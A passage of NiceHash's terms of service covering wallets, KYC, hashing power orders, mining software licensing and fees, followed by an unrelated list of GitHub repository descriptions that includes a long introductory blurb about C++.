NiceHash or any of its partners or affiliates are not responsible for the loss of the funds, stored on or transferred from the NiceHash Wallet, as well as for the erroneous implementation of the transactions made via NiceHash Wallet, where such loss or faulty implementation of the transaction are the result of a malfunction of the NiceHash Wallet and the malfunction was caused by you or the NiceHash Wallet provider. You are obliged to inform NiceHash in case of loss or theft, as well as in the case of any possible misuse of the access data to your NiceHash Account, without any delay, and demand change of access data or closure of your existing NiceHash Account and submit a request for new access data. NiceHash will execute the change of access data or closure of the NiceHash Account and the opening of new NiceHash Account as soon as technically possible and without any undue delay. All information pertaining to registration, including a registration form, generation of NiceHash Wallet and detailed instructions on the use of the NiceHash Account and NiceHash Wallet are available at NiceHash Platform. The registration form as well as the entire system is properly protected from unwanted interference by third parties. KYC PROCEDURE NiceHash is appropriately implementing AML/CTF and security measures to diligently detect and prevent any malicious or unlawful use of NiceHash Services or use, which is strictly prohibited by these Terms, which are deemed as your agreement to provide required personal information for identity verification. Security measures include a KYC procedure, which is aimed at determining the identity of an individual user or an organisation. We may ask you to complete this procedure before enabling some or all functionalities of the NiceHash platform and provide its services. 
A KYC procedure might be applied as a security measure when: changing the email address linked to your NiceHash Account, losing or changing your 2FA code; logging in to your NiceHash Account for the first time after the launch of the new NiceHash Platform in August 2019, gaining access to all or a portion of NiceHash Services, NiceHash Wallet and its related services or any portion thereof if they were disabled due to and activating your NiceHash Account if it has been deactivated due to its inactivity and/or security or other reasons. HASHING POWER TRANSACTIONS General NiceHash may, at any time and in our sole discretion, (i) refuse any order submitted or provided hashing power, (ii) cancel an order or part of the order before it is executed, (iii) impose limits on the order amount permitted or on provided hashing power or (iv) impose any other conditions or restrictions upon your use of the NiceHash Platform and Mining Services without prior notice. For example, but not limited to, NiceHash may limit the number of open orders that you may establish or limit the type of supported Hashing power rigs and mining algorithms or NiceHash may restrict submitting orders or providing hashing power from certain locations. Please refer to the NiceHash Platform, for more information about terminology, hashing power transactions’ definitions and descriptions, order types, order submission, order procedure, order rules and other restrictions and limitations of the hashing power transactions. NiceHash reserves the right to change any transaction, definitions, description, order types, procedure, rules, restrictions and limitations at any time for any reason. Orders, provision of hashing power, payments, deposits, withdrawals and other transactions are accepted only through the interface of the NiceHash Platform, NiceHash API and NiceHash Account and are fixed by the software and hardware tools of the NiceHash Platform. 
If you do not understand the meaning of any transaction option, NiceHash strongly encourages you not to utilize any of those options. Hashing Power Order In order to submit a Hashing Power Order via the NiceHash Account, the Hashing power buyer must have available funds in his NiceHash Wallet. Hashing power buyer submits a new order to buy hashing power via the NiceHash Platform or via the NiceHash API by setting the following parameters in the order form: NiceHash service server location, third-party mining pool, algorithm to use, order type, set amount he is willing to spend on this order, set price per hash he is willing to pay, optionally approximate limit maximum hashing power for his order and other parameters as requested and by confirming his order. Hashing power buyer may submit an order in maximum amount of funds available on his NiceHash Wallet at the time of order submission. Order run time is only approximate since order’s lifetime is based on the number of hashes that it delivers. Particularly during periods of high volume, illiquidity, fast movement or volatility in the marketplace for any digital assets or hashing power, the actual price per hash at which some of the orders are executed may be different from the prevailing price indicated on NiceHash Platform at the time of your order. You understand that NiceHash is not liable for any such price fluctuations. In the event of market disruption, NiceHash Services disruption, NiceHash Hashing Power Marketplace disruption or manipulation or Force Majeure Event, NiceHash may do one or more of the following: (i) suspend access to the NiceHash Account or NiceHash Platform, or (ii) prevent you from completing any actions in the NiceHash Account, including closing any open orders. Following any such event, when trading resumes, you acknowledge that prevailing market prices may differ significantly from the prices available prior to such event.
When Hashing power buyer submits an order for purchasing of the Hashing power via NiceHash Platform or via the NiceHash API he authorizes NiceHash to execute the order on his behalf and for his account in accordance with such order. Hashing power buyer acknowledges and agrees that NiceHash is not acting as his broker, intermediary, agent or advisor or in any fiduciary capacity. NiceHash executes the order in set order amount minus NiceHash’s processing fee. Once the order is successfully submitted the order amount starts to decrease in real time according to the payments for the provided hashing power. Hashing power buyer agrees to pay applicable processing fee to NiceHash for provided services. The NiceHash’s fees are deducted from Hashing power buyer’s NiceHash Wallet once the whole order is exhausted and completed. Please refer to the NiceHash Platform, for more information about the fees which are applicable at the time of provision of services. NiceHash reserves the right to change these fees according to the provisions to change these Terms at any time for any reason. The changed fees will apply only for the NiceHash Services provided after the change of the fees. All orders submitted prior to the fee change but not necessarily completed prior to the fee change will be charged according to the fees applicable at the time of the submission of the order. NiceHash will attempt, on a commercially reasonable basis, to execute the Hashing power buyer’s purchase of the hashing power on the Hashing power marketplace under these Terms according to the best-effort delivery approach. In this respect NiceHash does not guarantee that the hashing power will actually be delivered or verified and does not guarantee any quality of the NiceHash Services. Hashing power buyer may cancel a submitted order during order’s lifetime. If an order has been partially executed, Hashing power buyer may cancel the unexecuted remainder of the order.
In this case the NiceHash’s processing fee will apply only for the partially executed order. NiceHash reserves the right to refuse any order cancellation request once the order has been submitted. Selling Hashing Power and the Provision of Hashing Power In order to submit the hashing power to the NiceHash stratum server the Hashing power provider must first point its Hashing power rig to the NiceHash stratum server. Hashing power provider is solely responsible for configuration of his Hashing power rig. The Hashing power provider gets paid by Hashing power buyers for all validated and accepted work that his Hashing power rig has produced. The provided hashing power is validated by NiceHash’s stratum engine and validator. Once the hashing power is validated the Hashing power provider is entitled to receive the payment for his work. NiceHash logs all validated hashing power which was submitted by the Hashing power provider. The Hashing power provider receives the payments of current globally weighted average price on to his NiceHash Wallet or his selected personal Bitcoin address. The payments are made periodically depending on the height of payments. NiceHash reserves the right to hold the payments any time and for any reason by indicating the reason, especially if the payments represent smaller values. Please refer to the NiceHash Platform, for more information about the height of payments for provided hashing power, how the current globally weighted average price is calculated, payment periods, payment conditions and conditions for detention of payments. NiceHash reserves the right to change this payment policy according to the provisions to change these Terms at any time for any reason. All Hashing power rig’s earnings and profitability calculations on NiceHash Platform are only for informational purposes. NiceHash does not warrant that your Hashing power rigs would achieve the same profitability or earnings as calculated on NiceHash Platform. 
You hereby acknowledge that it is possible that your Hashing power rigs would not be as profitable as indicated in our informational calculations or would not be profitable at all. Hashing power provider agrees to pay applicable processing fee to NiceHash for provided Services. The NiceHash’s fees are deducted from all the payments made to the Hashing power provider for his provided work. Please refer to the NiceHash Platform, for more information about the fees which are applicable at the time of provision of services. Hashing power provider which has not submitted any hashing power to the NiceHash stratum server for a period of 90 days agrees that a processing fee of 0.00001000 BTC or less, depending on the unpaid mining balance, will be deducted from his unpaid mining balance. NiceHash reserves the right to change these fees according to the provisions to change these Terms at any time for any reason. The changed fees will apply only for the NiceHash Services provided after the change of the fees. NiceHash will attempt, on a commercially reasonable basis, to execute the provision of Hashing power providers’ hashing power on the Hashing power marketplace under these Terms according to the best-effort delivery approach. In this respect NiceHash does not guarantee that the hashing power will actually be delivered or verified and does not guarantee any quality of the NiceHash Services. Hashing power provider may disconnect the Hashing power rig from the NiceHash stratum server any time. NiceHash reserves the right to refuse any Hashing power rig once the Hashing power rig has been pointed towards NiceHash stratum server. 
RESTRICTIONS When accessing the NiceHash Platform or using the Mining Services or NiceHash Wallet, you warrant and agree that you: will not use the Services for any purpose that is unlawful or prohibited by these Terms, will not violate any law, contract, intellectual property or other third-party right or commit a tort, are solely responsible for your conduct while accessing the NiceHash Platform or using the Mining Services or NiceHash Wallet, will not access the NiceHash Platform or use the Mining Services in any manner that could damage, disable, overburden, or impair the provision of the Services or interfere with any other party's use and enjoyment of the Services, will not misuse and/or maliciously use Hashing power rigs, you will particularly refrain from using network botnets or using NiceHash Platform or Mining Services with Hashing power rigs without the knowledge or awareness of Hashing power rig owner(s), will not perform or attempt to perform any kind of malicious attacks on blockchains with the use of the NiceHash Platform or Mining Services, intended to maliciously gain control of more than 50% of the network's mining hash rate, will not use the NiceHash Platform or Mining Services for any kind of market manipulation or disruption, such as but not limited to NiceHash Mining Services disruption and NiceHash Hashing Power Marketplace manipulation. In case of any of the above mentioned events, NiceHash reserves the right to immediately suspend your NiceHash Account, freeze or block the funds in the NiceHash Wallet, and suspend your access to NiceHash Platform, particularly if NiceHash believes that such NiceHash Account are in violation of these Terms or Privacy Policy, or any applicable laws and regulation. RIGHTS AND OBLIGATIONS In the event of disputes with you, NiceHash is obliged to prove that the NiceHash service which is the subject of the dispute was not influenced by technical or other failure. 
You will have possibility to check at any time, subject to technical availability, the transactions details, statistics and available balance of the funds held on the NiceHash Wallet, through access to the NiceHash Account. You may not obtain or attempt to obtain any materials or information through any means not intentionally made available or provided to you or public through the NiceHash Platform or Mining Services. We may, in our sole discretion, at any time, for any or no reason and without liability to you, with prior notice (i) terminate all rights and obligations between you and NiceHash derived from these Terms, (ii) suspend your access to all or a portion of NiceHash Services, NiceHash Wallet and its related services or any portion thereof and delete or deactivate your NiceHash Account and all related information and files in such account (iii) modify, suspend or discontinue, temporarily or permanently, any portion of NiceHash Platform or (iv) provide enhancements or improvements to the features and functionality of the NiceHash Platform, which may include patches, bug fixes, updates, upgrades and other modifications. Any such change may modify or delete certain portion, features or functionalities of the NiceHash Services. You agree that NiceHash has no obligation to (i) provide any updates, or (ii) continue to provide or enable any particular portion, features or functionalities of the NiceHash Services to you. You further agree that all changes will be (i) deemed to constitute an integral part of the NiceHash Platform, and (ii) subject to these Terms. 
In the event of your breach of these Terms, including but not limited to, for instance, in the event that you breach any term of these Terms, due to legal grounds originating in anti-money laundering and know your client regulation and procedures, or any other relevant applicable regulation, all right and obligations between you and NiceHash derived from these Terms terminate automatically if you fail to comply with these Terms within the notice period of 8 days after you have been warned by NiceHash about the breach and given 8 days period to cure the breaches. NiceHash reserves the right to keep these rights and obligations in force despite your breach of these Terms. In the event of termination, NiceHash will attempt to return you any funds stored on your NiceHash Wallet not otherwise owed to NiceHash, unless NiceHash believes you have committed fraud, negligence or other misconduct. You acknowledge that the NiceHash Services and NiceHash Wallet may be suspended for maintenance. Technical information about the hashing power transactions, including information about chosen server locations, algorithms used, selected mining pools, your business or activities, including all financial and technical information, specifications, technology together with all details of prices, current transaction performance and future business strategy represent confidential information and trade secrets. NiceHash shall, preserve the confidentiality of all before mentioned information and shall not disclose or cause or permit to be disclosed without your permission any of these information to any person save to the extent that such disclosure is strictly to enable you to perform or comply with any of your obligations under these Terms, or to the extent that there is an irresistible legal requirement on you or NiceHash to do so; or where the information has come into the public domain otherwise than through a breach of any of the terms of these Terms. 
NiceHash shall not be entitled to make use of any of these confidential information and trade secrets other than during the continuance of and pursuant to these Terms and then only for the purpose of carrying out its obligations pursuant to these Terms. NICEHASH MINER LICENSE (NICEHASH MINING SOFTWARE LICENSE) NiceHash Mining Software whether on disk, in read only memory, or any other media or in any other form is licensed, not sold, to you by NiceHash for use only under these Terms. NiceHash retains ownership of the NiceHash Mining Software itself and reserves all rights not expressly granted to you. Subject to these Terms, you are granted a limited, non-transferable, non-exclusive and a revocable license to download, install and use the NiceHash Mining Software. You may not distribute or make the NiceHash Mining Software available over a network where it could be used by multiple devices at the same time. You may not rent, lease, lend, sell, redistribute, assign, sublicense host, outsource, disclose or otherwise commercially exploit the NiceHash Mining Software or make it available to any third party. There is no license fee for the NiceHash Mining Software. NiceHash reserves the right to change the license fee policy according to the provisions to change these Terms any time and for any reason, including to decide to start charging the license fee for the NiceHash Mining Software. You are responsible for any and all applicable taxes. 
You may not, and you agree not to or enable others to, copy, decompile, reverse engineer, reverse compile, disassemble, attempt to derive the source code of, decrypt, modify, or create derivative works of the NiceHash Mining Software or any services provided by the NiceHash Mining Software, or any part thereof (except as and only to the extent any foregoing restriction is prohibited by applicable law or to the extent as may be permitted by the licensing terms governing use of open-sourced components included with the NiceHash Mining Software). If you choose to allow automatic updates, your device will periodically check with NiceHash for updates and upgrades to the NiceHash Mining Software and, if an update or upgrade is available, the update or upgrade will automatically download and install onto your device and, if applicable, your peripheral devices. You can turn off the automatic updates altogether at any time by changing the automatic updates settings found within the NiceHash Mining Software. You agree that NiceHash may collect and use technical and related information, including but not limited to technical information about your computer, system and application software, and peripherals, that is gathered periodically to facilitate the provision of software updates, product support and other services to you (if any) related to the NiceHash Mining Software and to verify compliance with these Terms. NiceHash may use this information, as long as it is in a form that does not personally identify you, to improve our NiceHash Services. NiceHash Mining Software contains features that rely upon information about your selected mining pools. You agree to our transmission, collection, maintenance, processing, and use of all information obtained from you about your selected mining pools. You can opt out at any time by going to settings in the NiceHash Mining Software. NiceHash may provide interest-based advertising to you. 
If you do not want to receive relevant ads in the NiceHash Mining Software, you can opt out at any time by going to settings in the NiceHash Mining Software. If you opt out, you will continue to receive the same number of ads, but they may be less relevant because they will not be based on your interest. NiceHash Mining Software license is effective until terminated. All provisions of these Terms regarding the termination apply also for the NiceHash Mining Software license. Upon the termination of NiceHash Mining Software license, you shall cease all use of the NiceHash Mining Software and destroy or delete all copies, full or partial, of the NiceHash Mining Software. THIRD PARTY MINERS AND PLUGINS Third Party Miners and Plugins are a third party software which enables the best and most efficient mining operations. NiceHash Miner integrates third party mining software using a third party miner plugin system. Third Party Mining Software is a closed source software which supports mining algorithms for cryptocurrencies and can be integrated into NiceHash Mining Software. Third Party Miner Plugin enables the connection between NiceHash Mining Software and Third Party Mining Software and it can be closed, as well as open sourced. NiceHash Mining Software user interface enables the user to manually select which available Third Party Miners and Plugins will be downloaded and integrated. Users can select or deselect Third Party Miners and Plugins found in the Plugin Manager window. Some of the available Third Party Miners and Plugins which are most common are preselected by NiceHash, but can be deselected, depending on users' needs. The details of the Third Party Miners and Plugins available for NiceHash Mining Software are accessible within the NiceHash Mining Software user interface. 
The details include, but are not limited to, the author of the software and applicable license information, if applicable information about developer fee for Third Party Miners, software version etc. Developer fees may apply to the use of Third Party Miners and Plugins. NiceHash will not be liable, to the maximum extent permitted by applicable law, for any damages of any kind, including, but not limited to, direct, consequential, incidental, special or indirect damages, arising out of using Third Party Miners and Plugins. The latter includes, but is not limited to: i) any power outages, maintenance, defects, system failures, mistakes, omissions, errors, defects, viruses, delays in operation or transmission or any failure of performance; ii) any unauthorized access, alteration, deletion, destruction, damage, loss or failure to store any data, including records, private key or other credentials, associated with usage of Third Party Miners and Plugins and iii) Force Majeure Event, communications failure, theft or other interruptions. If you choose to allow automatic updates, your device will periodically check with NiceHash for updates and upgrades to the installed Third Party Miners and Plugins, if an update or upgrade is available, the update or upgrade will automatically download and install onto your device and, if applicable, your peripheral devices. You can turn off the automatic updates altogether at any time by changing the automatic updates settings found within the NiceHash Mining Software. NICEHASH QUICKMINER NiceHash QuickMiner is a software application that allows the visitors of the NiceHash Quick Miner web page, accessible at https://www.nicehash.com/quick-miner, to connect their PC or a mining rig to the NiceHash Hashing Power Marketplace. Visitors of the NiceHash Quick Miner web page can try out and experience crypto currency mining without having to register on the NiceHash Platform and create a NiceHash Account. 
Users are encouraged to do so as soon as possible in order to collect the funds earned using NiceHash Quick Miner. Users can download NiceHash QuickMiner free of charge. In order to operate NiceHash QuickMiner software needs to automatically detect technical information about users' computer hardware. You agree that NiceHash may collect and use technical and related information. For more information please refer to NiceHash Privacy Policy. Funds arising from the usage of NiceHash QuickMiner are transferred to a dedicated cryptocurrency wallet owned and managed by NiceHash. NiceHash QuickMiner Users expressly agree and acknowledge that completing the registration process and creating a NiceHash Account is necessary in order to collect the funds arising from the usage of NiceHash QuickMiner. Users of NiceHash QuickMiner who do not successfully register a NiceHash Account will lose their right to claim funds arising from their usage of NiceHash QuickMiner. Those funds, in addition to the condition that the user has not been active on the NiceHash QuickMiner web page for consecutive 7 days, will be donated to the charity of choice. NICEHASH PRIVATE ENDPOINT NiceHash Private Endpoint is a network interface that connects users privately and securely to NiceHash Stratum servers. Private Endpoint uses a private IP address and avoids additional latency caused by DDOS protection. All NiceHash Private Mining Proxy servers are managed by NiceHash and kept up-to-date. Users can request a dedicated private access endpoint by filling in the form for NiceHash Private Endpoint Solution available at the NiceHash Platform. In the form the user specifies the email address, country, number of connections and locations and algorithms used. Based on the request NiceHash prepares an individualized offer based on the pricing stipulated on the NiceHash Platform, available at https://www.nicehash.com/private-endpoint-solution. 
NiceHash may request additional information from the users of the Private Endpoint Solution in order to determine whether we are obligated to collect VAT from you, including your VAT identification number. INTELLECTUAL PROPERTY NiceHash retains all copyright and other intellectual property rights, including inventions, discoveries, knowhow, processes, marks, methods, compositions, formulae, techniques, information and data, whether or not patentable, copyrightable or protectable in trademark, and any trademarks, copyrights or patents based thereon over all content and other materials contained on NiceHash Platform or provided in connection with the Services, including, without limitation, the NiceHash logo and all designs, text, graphics, pictures, information, data, software, source code, as well as the compilation thereof, sound files, other files and the selection and arrangement thereof. This material is protected by international copyright laws and other intellectual property right laws, namely trademark. These Terms shall not be understood and interpreted in a way that they would mean assignment of copyright or other intellectual property rights, unless it is explicitly defined so in these Terms. NiceHash hereby grants you a limited, nonexclusive and non-sublicensable license to access and use NiceHash’s copyrighted work and other intellectual property for your personal or internal business use. Such license is subject to these Terms and does not permit any resale, the distribution, public performance or public display, modifying or otherwise making any derivative uses, use, publishing, transmission, reverse engineering, participation in the transfer or sale, or any way exploit any of the copyrighted work and other intellectual property other than for their intended purposes. This granted license will automatically terminate if NiceHash suspends or terminates your access to the Services, NiceHash Wallet or closes your NiceHash Account. 
NiceHash will own exclusive rights, including all intellectual property rights, to any feedback including, but not limited to, suggestions, ideas or other information or materials regarding NiceHash Services or related products that you provide, whether by email, posting through our NiceHash Platform, NiceHash Account or otherwise and you irrevocably assign any and all intellectual property rights on such feedback unlimited in time, scope and territory. Any Feedback you submit is non-confidential and shall become the sole property of NiceHash. NiceHash will be entitled to the unrestricted use, modification or dissemination of such feedback for any purpose, commercial or otherwise, without acknowledgment or compensation to you. You waive any rights you may have to the feedback. We have the right to remove any posting you make on NiceHash Platform if, in our opinion, your post does not comply with the content standards defined by these Terms. PRIVACY POLICY Please refer to our NiceHash Platform and Mining Services Privacy Policy published on the NiceHash Platform for information about how we collect, use and share your information, as well as what options do you have with regards to your personal information. COMMUNICATION AND SUPPORT You agree and consent to receive electronically all communications, agreements, documents, receipts, notices and disclosures that NiceHash provides in connection with your NiceHash Account or use of the NiceHash Platform and Services. You agree that NiceHash may provide these communications to you by posting them via the NiceHash Account or by emailing them to you at the email address you provide. You should maintain copies of electronic communications by printing a paper copy or saving an electronic copy. It is your responsibility to keep your email address updated in the NiceHash Account so that NiceHash can communicate with you electronically. 
You understand and agree that if NiceHash sends you an electronic communication but you do not receive it because your email address is incorrect, out of date, blocked by your service provider, or you are otherwise unable to receive electronic communications, it will be deemed that you have been provided with the communication. You can update your NiceHash Account preferences at any time by logging into your NiceHash Account. If your email address becomes invalid such that electronic communications sent to you by NiceHash are returned, NiceHash may deem your account to be inactive and close it. You may give NiceHash a notice under these Terms by sending an email to support@nicehash.com or contact NiceHash through support located on the NiceHash Platform. All communication and notices pursuant to these Terms must be given in English language. FEES Please refer to the NiceHash Platform for more information about the fees or administrative costs which are applicable at the time of provision of services. NiceHash reserves the right to change these fees according to the provisions to change these Terms at any time for any reason. The changed fees will apply only for the Services provided after the change of the fees. You authorize us, or our designated payment processor, to charge or deduct your NiceHash Account for any applicable fees in connection with the transactions completed via the Services. TAX It is your responsibility to determine what, if any, taxes apply to the transactions you complete or services you provide via the NiceHash Platform, Mining Services and NiceHash Wallet, it is your responsibility to report and remit the correct tax to the appropriate tax authority and all your factual and potential tax obligations are your concern. 
You agree that NiceHash is not in any case and under no conditions responsible for determining whether taxes apply to your transactions or services or for collecting, reporting, withholding or remitting any taxes arising from any transactions or services. You also agree that NiceHash is not in any case and under no conditions bound to compensate for your tax obligation or give you any advice related to tax issues. All fees and charges payable by you to NiceHash are exclusive of any taxes, and shall certain taxes be applicable, they shall be added on top of the payable amounts. Upon our request, you will provide to us any information that we reasonably request to determine whether we are obligated to collect VAT from you, including your VAT identification number. If any deduction or withholding is required by law, you will notify NiceHash and will pay NiceHash any additional amounts necessary to ensure that the net amount received by NiceHash, after any deduction and withholding, equals the amount NiceHash would have received if no deduction or withholding had been required. Additionally, you will provide NiceHash with documentation showing that the withheld and deducted amounts have been paid to the relevant taxing authority. FINAL PROVISIONS Natural persons and legal entities that are not capable of holding legal rights and obligations are not allowed to create NiceHash Account and use NiceHash Platform or other related services. If NiceHash becomes aware that such natural person or legal entity has created the NiceHash Account or has used NiceHash Services, NiceHash will delete such NiceHash Account and disable any Services and block access to NiceHash Account and NiceHash Services to such natural person or legal entity. 
If you register to use the NiceHash Services on behalf of a legal entity, you represent and warrant that (i) such legal entity is duly organized and validly existing under the applicable laws of the jurisdiction of its organization; and (ii) you are duly authorized by such legal entity to act on its behalf. These Terms do not create any third-party beneficiary rights in any individual or entity. These Terms forms the entire agreement and understanding relating to the subject matter hereof and supersede any previous and contemporaneous agreements, arrangements or understandings relating to the subject matter hereof to the exclusion of any terms implied by law that may be excluded by contract. If at any time any provision of these Terms is or becomes illegal, invalid or unenforceable, the legality, validity and enforceability of every other provisions will not in any way be impaired. Such illegal, invalid or unenforceable provision of these Terms shall be deemed to be modified and replaced by such legal, valid and enforceable provision or arrangement, which corresponds as closely as possible to our and your will and business purpose pursued and reflected in these Terms. Headings of sections are for convenience only and shall not be used to limit or construe such sections. No failure to enforce nor delay in enforcing, on our side to the Terms, any right or legal remedy shall function as a waiver thereof, nor shall any individual or partial exercise of any right or legal remedy prevent any further or other enforcement of these rights or legal remedies or the enforcement of any other rights or legal remedies. NiceHash reserves the right to make changes, amendments, supplementations or modifications from time to time to these Terms including but not limited to changes of licence agreement for NiceHash Mining Software and of any fees and compensations policies, in its sole discretion and for any reason. We suggest that you review these Terms periodically for changes. 
If we make changes to these Terms, we will provide you with notice of such changes, such as by sending an email, providing notice on the NiceHash Platform, placing a popup window after login to the NiceHash Account or by posting the amended Terms on the NiceHash Platform and updating the date at the top of these Terms. The amended Terms will be deemed effective immediately upon posting for any new users of the NiceHash Services. In all other cases, the amended Terms will become effective for preexisting users upon the earlier of either: (i) the date users click or press a button to accept such changes in their NiceHash Account, or (ii) continued use of NiceHash Services 30 days after NiceHash provides notice of such changes. Any amended Terms will apply prospectively to use of the NiceHash Services after such changes become effective. The notice of change of these Terms is considered as notice of termination of all rights and obligations between you and NiceHash derived from these Terms with notice period of 30 days, if you do not accept the amended Terms. If you do not agree to any amended Terms, (i) the agreement between you and NiceHash is terminated by expiry of 30 days period which starts after NiceHash provides you a notice of change of these Terms, (ii) you must discontinue using NiceHash Services and (iii) you must inform us regarding your disagreement with the changes and request closure of your NiceHash Account. If you do not inform us regarding your disagreement and do not request closure of your NiceHash Account, we will deem that you agree with the changed Terms. You may not assign or transfer your rights or obligations under these Terms without the prior written consent of NiceHash. NiceHash may assign or transfer any or all of its rights under these Terms, in whole or in part, without obtaining your consent or approval. 
These Terms shall be governed by and construed and enforced in accordance with the Laws of the British Virgin Islands, and shall be interpreted in all respects as a British Virgin Islands contract. Any transaction, dispute, controversy, claim or action arising from or related to your access or use of the NiceHash Platform or these Terms of Service likewise shall be governed by the Laws of the British Virgin Islands, exclusive of choice-of-law principles. The rights and remedies conferred on NiceHash by, or pursuant to, these Terms are cumulative and are in addition, and without prejudice, to all other rights and remedies otherwise available to NiceHash at law. NiceHash may transfer its rights and obligations under these Terms to other entities which include, but are not limited to H-BIT, d.o.o. and NICEX Ltd, or any other firm or business entity that directly or indirectly acquires all or substantially all of the assets or business of NICEHASH Ltd. If you do not consent to any transfer, you may terminate this agreement and close your NiceHash Account. These Terms are not boilerplate. If you disagree with any of them, believe that any should not apply to you, or wish to negotiate these Terms, please contact NiceHash and immediately navigate away from the NiceHash Platform. Do not use the NiceHash Mining Services, NiceHash Wallet or other related services until you and NiceHash have agreed upon new terms of service. Last updated: March 1, 2021
Hazrat-Ali9 / University Management Api Gateway Starter 🎓 University 🚤 Management 🚎 of a System 🚞 designed to 🚋 seamlessly connect 🚃 and secure 🚚 microservices while ☂ maintaining clean 🛼 architecture and 🎳 scalability ⚽ Integrated JWT 🥎 authentication 🏐 role-based 🏈 access control 🎮 and request 🧸 validation Load 📙 balancing rate 🧰 limiting and 🪣 logging middleware better reliability
jorgearanda / Kappa Stats A little Python script to generate Cohen's Kappa and Weighted Kappa measures for inter-rater reliability
vahide-b-84 / FaultTolerantTaskOffloadingSimulation This project proposes a DRL-based fault-tolerant task offloading method for Mobile Edge-Cloud Computing. Using a DDPG algorithm, it minimizes latency and enhances reliability for delay-sensitive tasks in dynamic environments while adapting to resource fluctuations and failure rates.
sanusanth / C Basic Simple Program What is C++? C++ is a general-purpose, object-oriented programming language. It was created by Bjarne Stroustrup at Bell Labs circa 1980. C++ is very similar to C (invented by Dennis Ritchie in the early 1970s). C++ is so compatible with C that it will probably compile over 99% of C programs without changing a line of source code. Though C++ is a much more well-structured and safer language than C, as it is OOP-based. Some computer languages are written for a specific purpose. Like, Java was initially devised to control toasters and some other electronics. C was developed for programming OS. Pascal was conceptualized to teach proper programming techniques. But C++ is a general-purpose language. It well deserves the widely acknowledged nickname "Swiss Pocket Knife of Languages." C++ is a cross-platform language that can be used to create high-performance applications. C++ was developed by Bjarne Stroustrup, as an extension to the C language. C++ gives programmers a high level of control over system resources and memory. The language was updated 3 major times in 2011, 2014, and 2017 to C++11, C++14, and C++17. About C++ Programming Multi-paradigm Language - C++ supports at least seven different styles of programming. Developers can choose any of the styles. General Purpose Language - You can use C++ to develop games, desktop apps, operating systems, and so on. Speed - Like C programming, the performance of optimized C++ code is exceptional. Object-oriented - C++ allows you to divide complex problems into smaller sets by using objects. Why Learn C++? C++ is used to develop games, desktop apps, operating systems, browsers, and so on because of its performance. After learning C++, it will be much easier to learn other programming languages like Java, Python, etc. C++ helps you to understand the internal architecture of a computer, how a computer stores and retrieves information. How to learn C++? 
C++ tutorial from Programiz - We provide step by step C++ tutorials, examples, and references. Get started with C++. Official C++ documentation - Might be hard to follow and understand for beginners. Visit official C++ documentation. Write a lot of C++ programming code- The only way you can learn programming is by writing a lot of code. Read C++ code- Join Github's open-source projects and read other people's code. C++ best programming language? The answer depends on perspective and requirements. Some tasks can be done in C++, though not very quickly. For example, designing GUI screens for applications. Other languages like Visual Basic, Python have GUI design elements built into them. Therefore, they are better suited for GUI type of task. Some of the scripting languages that provide extra programmability to applications. Such as MS Word and even photoshop tend to be variants of Basic, not C++. C++ is still used widely, and the most famous software have their backbone in C++. This tutorial will help you learn C++ basic and the advanced concepts. Who uses C++? Some of today's most visible used systems have their critical parts written in C++. Examples are Amadeus (airline ticketing) Bloomberg (financial formation), Amazon (Web commerce), Google (Web search) Facebook (social media) Many programming languages depend on C++'s performance and reliability in their implementation. Examples include: Java Virtual Machines JavaScript interpreters (e.g., Google's V8) Browsers (e.g., Internet Explorer, Mozilla's Firefox, Apple's Safari, and Google's Chrome) Application and Web frameworks (e.g., Microsoft's .NET Web services framework). Applications that involve local and wide area networks, user interaction, numeric, graphics, and database access highly depend on C++ language. Why Use C++ C++ is one of the world's most popular programming languages. C++ can be found in today's operating systems, Graphical User Interfaces, and embedded systems. 
C++ is an object-oriented programming language which gives a clear structure to programs and allows code to be reused, lowering development costs. C++ is portable and can be used to develop applications that can be adapted to multiple platforms. C++ is fun and easy to learn! As C++ is close to C# and Java, it makes it easy for programmers to switch to C++ or vice versa Definition - What does C++ Programming Language mean? C++ is an object oriented computer language created by notable computer scientist Bjorne Stroustrop as part of the evolution of the C family of languages. Some call C++ “C with classes” because it introduces object oriented programming principles, including the use of defined classes, to the C programming language framework. C++ is pronounced "see-plus-plus." C++ Variables Variables are the backbone of any programming language. A variable is merely a way to store some information for later use. We can retrieve this value or data by referring to a "word" that will describe this information. Once declared and defined they may be used many times within the scope in which they were declared. C++ Control Structures When a program runs, the code is read by the compiler line by line (from top to bottom, and for the most part left to right). This is known as "code flow." When the code is being read from top to bottom, it may encounter a point where it needs to make a decision. Based on the decision, the program may jump to a different part of the code. It may even make the compiler re-run a specific piece again, or just skip a bunch of code. You could think of this process like if you were to choose from different courses from Guru99. You decide, click a link and skip a few pages. In the same way, a computer program has a set of strict rules to decide the flow of program execution. C++ Syntax The syntax is a layout of words, expression, and symbols. Well, it's because an email address has its well-defined syntax. 
You need some combination of letters, numbers, potentially with underscores (_) or periods (.) in between, followed by an at the rate (@) symbol, followed by some website domain (company.com). So, syntax in a programming language is much the same. They are some well-defined set of rules that allow you to create some piece of well-functioning software. But, if you don't abide by the rules of a programming language or syntax, you'll get errors. C++ Tools In the real world, a tool is something (usually a physical object) that helps you to get a certain job done promptly. Well, this holds true with the programming world too. A tool in programming is some piece of software which when used with the code allows you to program faster. There are probably tens of thousands, if not millions of different tools across all the programming languages. Most crucial tool, considered by many, is an IDE, an Integrated Development Environment. An IDE is a software which will make your coding life so much easier. IDEs ensure that your files and folders are organized and give you a nice and clean way to view them. Types of C++ Errors Another way to look at C++ in a practical sense is to start enumerating different kinds of errors that occur as the written code makes its way to final execution. First, there are syntax errors where the code is actually written in an illegible way. This can be a misuse of punctuation, or the misspelling of a function command or anything else that compromises the integrity of the syntax as it is written. Another fundamental type of error is a compiler error that simply tells the programmer the compiler was not able to do its work effectively. As a compiler language, C++ relies on the compiler to make the source code into machine readable code and optimize it in various ways. A third type of error happens after the program has been successfully compiled. Runtime errors are not uncommon in C++ executables. 
What they represent is some lack of designated resource or non-working command in the executable program. In other words, the syntax is right, and the program was compiled successfully, but as the program is doing its work, it encounters a problem, whether that has to do with interdependencies, operating system requirements or anything else in the general environment in which the program is trying to work. Over time, C++ has remained a very useful language not only in computer programming itself, but in teaching new programmers about how object oriented programming works.
jmgirard / Agreement
R package for the tidy calculation of inter-rater reliability
wpjunior / Multi Burn Rate Calculator
Calculator to view detection time using error budget consumption rates, based on lessons from Site Reliability Engineering Workbook
Vu5e / JobFailurePredictionGoogleTraces2019
